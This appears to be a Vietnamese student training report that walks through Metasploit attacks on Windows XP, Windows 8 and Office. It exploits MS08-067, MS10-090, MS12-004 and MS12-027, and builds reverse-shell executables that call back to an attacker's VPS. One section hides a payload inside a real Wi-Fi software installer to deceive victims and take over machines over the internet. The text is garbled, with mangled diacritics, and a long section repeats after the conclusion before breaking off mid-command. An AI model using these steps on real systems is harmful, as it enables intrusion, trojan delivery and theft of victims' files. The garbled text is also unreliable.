Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
